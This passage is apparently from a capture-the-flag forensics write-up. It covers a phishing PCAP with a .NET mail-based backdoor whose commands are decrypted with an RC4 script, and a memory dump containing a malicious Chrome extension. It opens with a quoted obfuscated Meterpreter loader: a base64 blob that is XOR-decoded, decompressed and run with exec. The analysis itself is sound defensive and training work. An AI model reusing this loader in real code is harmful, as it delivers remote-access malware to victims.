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")
meterpreter_data = bytes([data[i] ^ key[i % len(key)] for i in range(len(data))])
exec(__import__('zlib').decompress(meterpreter_data)[0])
Silent Trap [Forensics]
Question: A critical incident has occurred in Tales from Eldoria, trapping thousands of players in the virtual world with no way to log out. The cause has been traced back to Malakar, a mysterious entity that launched a sophisticated attack, taking control of the developers’ and system administrators’ computers. With key systems compromised, the game is unable to function properly, which is why players remain trapped in Eldoria. Now, you must investigate what happened and find a way to restore the system, freeing yourself from the game before it’s too late.
Flag: N/A
We are given a PCAP file to investigate and several questions to answer. Once all questions are answered, the challenge is considered solved.
Question 1: What is the subject of the first email that the victim opened and replied to?
The first email received from the malicious actor can be identified on HTTP stream 4.
Question 2: On what date and time was the suspicious email sent? (Format: YYYY-MM-DD_HH:MM) (for example: 1945-04-30_12:34)
The suspicious email with the malicious attachment can be identified on HTTP stream 8.
Question 3: What is the MD5 hash of the malware file?
The malicious attachment can be obtained via HTTP objects from the PCAP itself. The password to extract the malware file was already mentioned in the suspicious email.
1
2
└─$ md5sum Eldoria_Balance_Issue_Report.pdf.exe
c0b37994963cc0aadd6e78a256c51547 Eldoria_Balance_Issue_Report.pdf.exe
Question 4: What credentials were used to log into the attacker’s mailbox? (Format: username:password)
Since the malware file is a .NET executable, we can analyze it statically with dnSpy. The credentials can be identified in one of the main functions.
Question 5: What is the name of the task scheduled by the attacker?
Further analysis on the functions show that it tries to connect to a mail server and execute remote CMD commands which are encoded with XOR and base64.
Additionally, we can see that the XOR key is being encrypted with RC4 from another function. The RC4 seems to be using the value of pwd
which indicates the password. Since we already have the username and password previously, we can easily decrypt the XOR key.
Hence, a Python script can be created to replicate the malicious functions and decrypt each CMD commands.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import base64
KEY = [
168, 115, 174, 213, 168, 222, 72, 36, 91, 209, 242, 128, 69, 99, 195, 164, 238, 182, 67, 92,
7, 121, 164, 86, 121, 10, 93, 4, 140, 111, 248, 44, 30, 94, 48, 54, 45, 100, 184, 54,
28, 82, 201, 188, 203, 150, 123, 163, 229, 138, 177, 51, 164, 232, 86, 154, 179, 143, 144, 22,
134, 12, 40, 243, 55, 2, 73, 103, 99, 243, 236, 119, 9, 120, 247, 25, 132, 137, 67, 66,
111, 240, 108, 86, 85, 63, 44, 49, 241, 6, 3, 170, 131, 150, 53, 49, 126, 72, 60, 36,
144, 248, 55, 10, 241, 208, 163, 217, 49, 154, 206, 227, 25, 99, 18, 144, 134, 169, 237, 100,
117, 22, 11, 150, 157, 230, 173, 38, 72, 99, 129, 30, 220, 112, 226, 56, 16, 114, 133, 22,
96, 1, 90, 72, 162, 38, 143, 186, 35, 142, 128, 234, 196, 239, 134, 178, 205, 229, 121, 225,
246, 232, 205, 236, 254, 152, 145, 98, 126, 29, 217, 74, 177, 142, 19, 190, 182, 151, 233, 157,
76, 74, 104, 155, 79, 115, 5, 18, 204, 65, 254, 204, 118, 71, 92, 33, 58, 112, 206, 151,
103, 179, 24, 164, 219, 98, 81, 6, 241, 100, 228, 190, 96, 140, 128, 1, 161, 246, 236, 25,
62, 100, 87, 145, 185, 45, 61, 143, 52, 8, 227, 32, 233, 37, 183, 101, 89, 24, 125, 203,
227, 9, 146, 156, 208, 206, 194, 134, 194, 23, 233, 100, 38, 158, 58, 159
]
def rc4_decrypt(key, data):
S = list(range(256))
j = 0
for i in range(256):
j = (j + S[i] + key[i % len(key)]) % 256
S[i], S[j] = S[j], S[i]
i = j = 0
decrypted = bytearray()
for byte in data:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i]
keystream = S[(S[i] + S[j]) % 256]
decrypted.append(byte ^ keystream)
return bytes(decrypted)
def xor_payload(encoded_data):
encrypted_key = base64.b64decode(encoded_data)
decrypted_key = rc4_decrypt(KEY, encrypted_key)
return decrypted_key.decode("utf-8", errors="ignore")
payload = "<ENCRYPTED_PAYLOAD>"
decrypted = xor_payload(payload)
print("Decrypted text:", decrypted)
Decrypting each CMD commands manually, the scheduled task can be identified on TCP stream 35.
Question 6: What is the API key leaked from the highly valuable file discovered by the attacker?
Similarly, the leaked API key can be identified on TCP stream 97.
Stealth Invasion [Forensics]
Question: Selene’s normally secure laptop recently fell victim to a covert attack. Unbeknownst to her, a malicious Chrome extension was stealthily installed, masquerading as a useful productivity tool. Alarmed by unusual network activity, Selene is now racing against time to trace the intrusion, remove the malicious software, and bolster her digital defenses before more damage is done.
Flag: N/A
We are given a memory dump to investigate and several questions to answer. Once all questions are answered, the challenge is considered solved. PS: Volatility3 on WSL2 could not analyze the memory dump so I had to resort to a VM.
Question 1: What is the PID of the Original (First) Google Chrome process
Question 2: What is the only Folder on the Desktop
Question 3: What is the Extention’s ID (ex: hlkenndednhfkekhgcdicdfddnkalmdm)
Where does Chrome store extensions?
Question 4: After examining the malicious extention’s code, what is the log filename in which the datais stored
Where is chrome extension’s ‘chrome.storage.local’ data saved?
Question 5: What is the URL the user navigated to
Question 6: What is the password of selene@rangers.eldoria.com
Cave Expedition [Forensics]
